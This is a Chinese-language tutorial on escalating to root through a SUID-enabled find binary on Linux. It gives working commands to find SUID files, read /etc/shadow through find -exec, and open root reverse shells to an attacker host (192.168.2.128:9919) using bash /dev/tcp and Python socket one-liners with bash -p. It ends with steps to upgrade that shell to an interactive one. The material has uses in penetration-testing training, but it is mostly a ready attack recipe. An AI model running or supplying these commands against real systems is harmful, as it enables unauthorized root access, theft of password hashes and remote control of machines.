find 命令提权

find 命令提权

普通用户find命令提权

先查看find命令有没有提权的可能

1. 查看find命令权限

方法 一、

# 1. 查看find命令位置
which find

# 2. 查看 find 命令权限
ls -l  /usr/bin/find   #  这是find 默认位置

-rwsr-xr-x. 1 root root 199200 Nov 20  2015 /usr/bin/find
# 有s 表示可以提权

方法 二、

# 用find 命令查找 有超级属性的文件

find / -perm -u=s -type f 2>/dev/null

---

2. 假如find命令可提权 有s权限位

权限位 u + s

权限为 4xxx

# 查看是否可以用root 命令执行命令

find `which find` -exec whoami \;
# 命令解释： 以find 命令 执行  whoami 命令。   
# find  (一个路径或文件必须存在)  -exec  执行命令 （结束）\;

可以直接执行命令

find /usr/bin/find -exec cat /etc/shadow \;

查看普通用户没有权限查看的文件。

3. 反弹shell

常规套路 ，2个机器。 一个开监听，一个执行反弹命令

用途	ip
攻击机（root 用户）	192.168.2.128	开监听
靶机（普通用户）	192.168.2.10	执行反弹shell 命令

3.1 开监听

# 监听 9919 端口
nc -lvvnp  9919

3.2 执行反弹shell 命令

# 用find 命令执行
find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.2.128/9919 0>&1 \;

# python 方式反弹
find /etc/passwd -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.128",9919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-ip"]);' \;

-p : 让 euid 为0 ， 权限为root 权限

默认情况下 bash 在执行时，如果发现 euid 和 uid 不匹配，会将 euid（即 suid） 强制重置为uid 。如果使用了 -p 参数，则不会再覆盖。

3.3 验证

# 在反弹的shell 中 执行命令
bash-4.2# whoami
whoami
root
bash-4.2# id
id
uid=1005(zzzz) gid=1005(zzzz) euid=0(root) groups=1005(zzzz)

此shell 为不完整的shell， 升级交互式。

3.4 升级交互式shell

# 在反弹shell 上执行

[root@localhost ~]# python -c 'import pty; pty.spawn("/bin/bash")'   
#使用python，升级交互shell

[root@localhost ~]# ^Z		     
# ctrl + z 按键  挂起正在运行的程序 

root@kali64:~# stty raw -echo	      
# 输入这句后 在输入命令终端不在显示 

root@kali64:~# fg		      
# 把后台挂起的程序，放到控制台----》 终端不显示命令，输入后回车

[root@localhost ~]# reset